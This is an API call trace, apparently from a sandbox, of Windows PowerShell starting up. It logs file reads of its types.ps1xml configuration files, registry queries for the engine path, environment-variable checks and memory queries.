	[0524.765] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd510 | out: lpFileInformation=0x1cd510*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0524.766] SetErrorMode (uMode=0x1) returned 0x1
	[0524.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0524.770] SetErrorMode (uMode=0x1) returned 0x1
	[0524.770] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd510 | out: lpFileInformation=0x1cd510*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0524.770] SetErrorMode (uMode=0x1) returned 0x1
	[0525.734] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0525.734] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0525.734] CoTaskMemFree (pv=0x3e2f10) 
	[0525.743] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0525.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0525.743] CoTaskMemFree (pv=0x3e2f10) 
	[0525.744] GetACP () returned 0x4e4
	[0525.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0525.752] SetErrorMode (uMode=0x1) returned 0x1
	[0525.752] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0525.752] GetFileType (hFile=0x328) returned 0x1
	[0525.752] SetErrorMode (uMode=0x1) returned 0x1
	[0525.752] GetFileType (hFile=0x328) returned 0x1
	[0525.753] ReadFile (in: hFile=0x328, lpBuffer=0x2c9ca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2c9ca18*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0525.756] ReadFile (in: hFile=0x328, lpBuffer=0x2c9ca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2c9ca18*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0525.756] ReadFile (in: hFile=0x328, lpBuffer=0x2c9ca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2c9ca18*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0525.757] ReadFile (in: hFile=0x328, lpBuffer=0x2c9ca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2c9ca18*, lpNumberOfBytesRead=0x1cd448*=0xcf3, lpOverlapped=0x0) returned 1
	[0525.757] ReadFile (in: hFile=0x328, lpBuffer=0x2c9be73, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2c9be73*, lpNumberOfBytesRead=0x1cd448*=0x0, lpOverlapped=0x0) returned 1
	[0525.757] ReadFile (in: hFile=0x328, lpBuffer=0x2c9ca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2c9ca18*, lpNumberOfBytesRead=0x1cd448*=0x0, lpOverlapped=0x0) returned 1
	[0525.760] CloseHandle (hObject=0x328) returned 1
	[0525.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0525.764] SetErrorMode (uMode=0x1) returned 0x1
	[0525.764] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd3c0 | out: lpFileInformation=0x1cd3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0525.764] SetErrorMode (uMode=0x1) returned 0x1
	[0525.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0525.766] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd4a8 | out: phkResult=0x1cd4a8*=0x328) returned 0x0
	[0525.766] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd42c, lpData=0x0, lpcbData=0x1cd428*=0x0 | out: lpType=0x1cd42c*=0x1, lpData=0x0, lpcbData=0x1cd428*=0x56) returned 0x0
	[0525.766] CoTaskMemAlloc (cb=0x5a) returned 0x1b7b7730
	[0525.766] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd3fc, lpData=0x1b7b7730, lpcbData=0x1cd3f8*=0x56 | out: lpType=0x1cd3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd3f8*=0x56) returned 0x0
	[0525.767] CoTaskMemFree (pv=0x1b7b7730) 
	[0525.767] RegCloseKey (hKey=0x328) returned 0x0
	[0525.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0525.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0527.493] GetSystemInfo (in: lpSystemInfo=0x1cc0e0 | out: lpSystemInfo=0x1cc0e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0527.495] VirtualQuery (in: lpAddress=0x1cc190, lpBuffer=0x1cd050, dwLength=0x30 | out: lpBuffer=0x1cd050*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0527.512] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0527.512] GetFileType (hFile=0x324) returned 0x1
	[0527.512] SetErrorMode (uMode=0x1) returned 0x1
	[0527.512] GetFileType (hFile=0x324) returned 0x1
	[0527.512] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.512] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.512] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.513] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.513] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.513] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.513] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.513] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.513] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.514] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.515] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.515] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.515] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.515] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.516] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.516] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.516] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.518] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.518] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.518] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.518] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.519] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.519] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.519] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.519] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.519] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.520] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.520] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.520] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.520] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.520] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.521] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.521] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.524] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.524] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.524] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.524] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.525] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.525] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.525] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.525] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1000, lpOverlapped=0x0) returned 1
	[0527.525] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x1b4, lpOverlapped=0x0) returned 1
	[0527.526] ReadFile (in: hFile=0x324, lpBuffer=0x2b720e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd448, lpOverlapped=0x0 | out: lpBuffer=0x2b720e0*, lpNumberOfBytesRead=0x1cd448*=0x0, lpOverlapped=0x0) returned 1
	[0527.526] CloseHandle (hObject=0x324) returned 1
	[0527.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0527.526] SetErrorMode (uMode=0x1) returned 0x1
	[0527.526] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd3c0 | out: lpFileInformation=0x1cd3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0527.526] SetErrorMode (uMode=0x1) returned 0x1
	[0527.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0527.526] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd4a8 | out: phkResult=0x1cd4a8*=0x324) returned 0x0
	[0527.527] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd42c, lpData=0x0, lpcbData=0x1cd428*=0x0 | out: lpType=0x1cd42c*=0x1, lpData=0x0, lpcbData=0x1cd428*=0x56) returned 0x0
	[0527.527] CoTaskMemAlloc (cb=0x5a) returned 0x1b7b78f0
	[0527.527] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd3fc, lpData=0x1b7b78f0, lpcbData=0x1cd3f8*=0x56 | out: lpType=0x1cd3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd3f8*=0x56) returned 0x0
	[0527.527] CoTaskMemFree (pv=0x1b7b78f0) 
	[0527.527] RegCloseKey (hKey=0x324) returned 0x0
	[0527.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0527.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0529.701] VirtualQuery (in: lpAddress=0x1cc190, lpBuffer=0x1cd050, dwLength=0x30 | out: lpBuffer=0x1cd050*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0530.808] VirtualQuery (in: lpAddress=0x1cc190, lpBuffer=0x1cd050, dwLength=0x30 | out: lpBuffer=0x1cd050*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0531.779] VirtualQuery (in: lpAddress=0x1cc190, lpBuffer=0x1cd050, dwLength=0x30 | out: lpBuffer=0x1cd050*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0531.784] VirtualQuery (in: lpAddress=0x1cc190, lpBuffer=0x1cd050, dwLength=0x30 | out: lpBuffer=0x1cd050*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0536.769] VirtualQuery (in: lpAddress=0x1cc1a0, lpBuffer=0x1cd060, dwLength=0x30 | out: lpBuffer=0x1cd060*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0536.770] VirtualQuery (in: lpAddress=0x1cc1a0, lpBuffer=0x1cd060, dwLength=0x30 | out: lpBuffer=0x1cd060*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0536.772] VirtualQuery (in: lpAddress=0x1cc190, lpBuffer=0x1cd050, dwLength=0x30 | out: lpBuffer=0x1cd050*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0537.755] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0537.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.755] CoTaskMemFree (pv=0x3e2f10) 
	[0537.776] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd648 | out: phkResult=0x1cd648*=0x324) returned 0x0
	[0537.776] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1cd65c, lpData=0x0, lpcbData=0x1cd658*=0x0 | out: lpType=0x1cd65c*=0x1, lpData=0x0, lpcbData=0x1cd658*=0x74) returned 0x0
